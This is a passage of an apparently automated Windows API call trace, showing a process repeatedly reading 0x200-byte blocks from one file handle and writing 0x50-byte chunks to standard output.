lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.852] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.852] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.853] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.853] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.855] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.855] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.856] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.856] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.857] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] GetFileType (hFile=0x50) returned 0x1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.857] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.858] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.858] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] GetFileType (hFile=0x50) returned 0x1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.858] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.859] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.859] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] GetFileType (hFile=0x50) returned 0x1 [0129.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.859] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | 